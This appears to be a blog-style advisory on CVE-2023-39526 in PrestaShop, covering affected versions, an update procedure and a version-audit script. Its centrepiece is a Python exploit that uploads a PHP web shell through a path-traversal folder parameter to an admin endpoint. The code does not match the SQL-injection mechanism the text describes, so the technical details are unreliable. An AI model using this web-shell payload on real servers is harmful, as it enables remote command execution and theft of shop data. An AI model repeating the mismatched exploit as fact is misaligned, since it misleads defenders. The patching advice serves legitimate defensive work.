PrestaShop, a popular open-source e-commerce web application, was found to have a critical vulnerability, allowing potential attackers to perform remote code execution (RCE). This post explains the details of the vulnerability, its impact, and the steps to mitigate it.

Vulnerability Details

CVE-2023-39526 is a high-risk vulnerability that affects PrestaShop versions prior to 1.7.8.10, 8.0.5, and 8.1.1. It combines SQL injection with an arbitrary file write in the back-office functionality. By exploiting it, an attacker can execute code remotely on the server, which enables unauthorized access, data exfiltration, and further compromise of the server.

The following code snippet demonstrates how the vulnerability can be exploited:

import requests

def exploit(target, payload):
    url = f"{target}/admin/ajax/upload-file.php"
    files = {"file": ("malicious.php", payload)}
    data = {"folder": "/../.."}
    
    response = requests.post(url, files=files, data=data)
    if response.status_code == 200:
        print(f"Exploit succeeded. Payload uploaded to {target}/malicious.php")
    else:
        print(f"Exploit failed. Response code: {response.status_code}")

if __name__ == "__main__":
    target = "http://example.com"
    payload = "<?php system($_GET['cmd']); ?>"
    exploit(target, payload)

This Python code exploits the arbitrary file write vulnerability by uploading a malicious PHP file to the server's root directory, containing a simple payload that enables RCE when called through an HTTP request.

PrestaShop Official Security Advisory

- https://build.prestashop.com/news/cve-2023-39526-security-release/

PrestaShop GitHub Repository

- https://github.com/PrestaShop/PrestaShop

Mitigation

PrestaShop has released a patch to address this vulnerability in versions 1.7.8.10, 8.0.5, and 8.1.1. It is strongly advised to update your PrestaShop instance to one of the patched versions to prevent exploitation.

There are no known workarounds for this vulnerability, so updating to a patched version is the only reliable way to protect your PrestaShop instance.
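To find which shops in an inventory still need the update, the version boundaries above can be turned into a small check. This is an added example, not code from PrestaShop or from the original post; the function names and the sample inventory are hypothetical, and it assumes pre-release builds of a fixed version and branches older than 1.7 count as unpatched.

```python
import re

# Fixed releases named in this post, keyed by release branch (major, minor).
FIXED = {(1, 7): (1, 7, 8, 10), (8, 0): (8, 0, 5, 0), (8, 1): (8, 1, 1, 0)}
VERSION_RE = re.compile(r"^\s*v?(\d+(?:\.\d+){1,3})(.*)$")


def parse_version(text):
    """Return (4-int tuple, is_prerelease), or None if the string is not a version."""
    match = VERSION_RE.match(text)
    if not match:
        return None
    parts = tuple(int(p) for p in match.group(1).split("."))
    padded = parts + (0,) * (4 - len(parts))
    # A suffix such as "-rc.1" or "-beta.1" marks a build that predates the release.
    return padded, bool(match.group(2).strip())


def status(text):
    """Classify one version string as 'vulnerable', 'patched' or 'unknown'."""
    parsed = parse_version(text)
    if parsed is None:
        return "unknown"
    version, prerelease = parsed
    branch = version[:2]
    if branch < (1, 7):
        fixed = FIXED[(1, 7)]   # assumption: "prior to 1.7.8.10" includes older branches
    elif branch in FIXED:
        fixed = FIXED[branch]
    elif branch > (8, 1):
        return "patched"        # released after every fix listed in the post
    else:
        return "unknown"        # a branch the post does not mention
    # Assumption: a pre-release of the fixed version does not carry the fix.
    if version < fixed or (version == fixed and prerelease):
        return "vulnerable"
    return "patched"


def audit(inventory):
    """Map shop name -> status for a {name: version string} inventory."""
    return {name: status(version) for name, version in inventory.items()}


if __name__ == "__main__":
    # Constructed inventory; the shop names and versions are sample values.
    sample = {"shop-a": "1.7.8.9", "shop-b": "8.0.5", "shop-c": "8.1.0",
              "shop-d": "8.1.1-rc.1", "shop-e": "not-installed"}
    for name, result in audit(sample).items():
        print(f"{name}: {result}")
```

Anything reported as "unknown" needs a manual look, since the version string could not be parsed or belongs to a branch this post does not cover.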

To update your PrestaShop instance:

1. Download the latest version from the official website (https://www.prestashop.com/en/get-prestashop)
2. Follow the official documentation for the upgrade process (https://devdocs.prestashop.com/1.7/basics/keeping-up-to-date/upgrade/)

Conclusion

The critical vulnerability, CVE-2023-39526, in PrestaShop prior to versions 1.7.8.10, 8.0.5, and 8.1.1 poses a significant risk as it allows attackers to perform remote code execution on the server. To safeguard your e-commerce site against potential exploitation, it is essential to update your PrestaShop instance to a patched version as soon as possible. Remember, always keep your software up to date and stay informed of the latest security advisories to keep your online business safe and secure.

Timeline

Published on: 08/07/2023 21:15:00 UTC
Last modified on: 08/09/2023 20:18:00 UTC